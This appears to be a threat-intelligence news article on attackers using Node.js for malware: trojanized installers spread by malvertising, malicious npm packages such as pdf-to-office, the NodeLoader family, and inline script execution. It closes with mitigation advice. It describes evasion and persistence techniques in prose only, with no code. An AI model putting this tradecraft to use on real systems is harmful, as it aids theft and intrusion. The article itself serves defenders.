Attackers are increasingly exploiting Node.js, a widely trusted, open-source JavaScript runtime, to deliver sophisticated malware, steal sensitive data, and compromise entire systems.
Recent campaigns observed since late 2024 have showcased a shift in attacker tactics. They leverage Node.js both for direct script execution and as a vehicle for compiled malware, often bypassing traditional security controls.
Thanks to its cross-platform capabilities and robust ecosystem, Node.js is popular among developers for building scalable front-end and back-end applications.
.png
)
However, threat actors are now weaponizing these very strengths. Attracting malicious code within Node.js executables or npm (Node Package Manager) packages allows attackers to blend their malware with legitimate applications, evade detection, and persist within target environments.
Attack Vectors and Techniques
Malvertising and Social Engineering
One prominent campaign involves malvertising, placing malicious ads on popular websites to lure users into downloading trojanized installers.
For example, users seeking cryptocurrency trading tools are redirected to fraudulent sites hosting installers built with Node.js and Wix.
These installers contain malicious DLLs, which, upon execution, gather system information using Windows Management Instrumentation (WMI) and establish persistence via scheduled tasks that launch PowerShell commands.
Supply Chain Attacks via npm
Supply chain compromises have surged, with attackers hijacking legitimate npm packages or creating lookalike packages (typosquatting).
Notably, the malicious pdf-to-office npm package targeted crypto wallet software like Atomic Wallet and Exodus.
Once installed, it injects obfuscated JavaScript to intercept and reroute cryptocurrency transactions, exploiting the trusted status of these packages and the Electron framework’s architecture.
Threat actors use tools like the pkg npm module to package Node.js applications into standalone Windows executables.
The NodeLoader malware family exemplifies this trend, delivering second-stage payloads such as XMRig cryptocurrency miners and information stealers like Lumma and Phemedrone Stealer.
NodeLoader leverages the sudo-prompt module for privilege escalation and hides its activities by creating hidden directories and obfuscated PowerShell scripts.
Inline Script Execution
Emerging techniques include direct execution of malicious JavaScript via Node.js in the command line.
Attackers use PowerShell to download the Node.js binary (node.exe) and execute JavaScript that performs network discovery, credential theft, and persistence by modifying registry run keys.
Command-and-control (C2) communications are disguised as legitimate traffic, often using Cloudflare tunnels.
Microsoft reports that the attack chain involves initial access where the user downloads a malicious installer from a fake cryptocurrency platform.
Further, the installer loads a DLL, collects system info via WMI, and sets up a scheduled task for a PowerShell command. The PowerShell commands exclude processes and directories from antivirus scanning.
Obfuscated scripts gather Windows, BIOS, and user data, sending it in JSON format to a remote C2 server via HTTP POST.
Additional scripts fetch and execute Node.js binaries and compiled JavaScript files (JSC), which launch further malicious routines—such as credential theft and browser data exfiltration.
- Uncommon as a Malware Platform: Few antivirus signatures exist for Node.js-compiled binaries, especially those exceeding 35MB in size.
- Obfuscation & Legitimate Appearance: Malicious scripts are often minified and obfuscated, making static analysis difficult. Attackers also mimic legitimate software to avoid suspicion.
- Supply Chain Complexity: npm’s dependency structure allows a single compromised package to infect thousands of downstream applications.
Mitigation Strategies
- Warn against downloading software from unverified sources.
- Flag unauthorized node.exe executions.
- Enable script block and module logging.
- Use EDR/XDR solutions to monitor script execution and block suspicious activity.
- Implement firewall rules to block known malicious domains and suspicious C2 traffic.
The abuse of Node.js for malware delivery and data theft marks a significant evolution in cyberattack methodologies.
As attackers grow more adept at blending malicious code with trusted platforms, organizations must enhance monitoring, update vulnerable dependencies, and educate users to defend against these emerging threats.
Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy
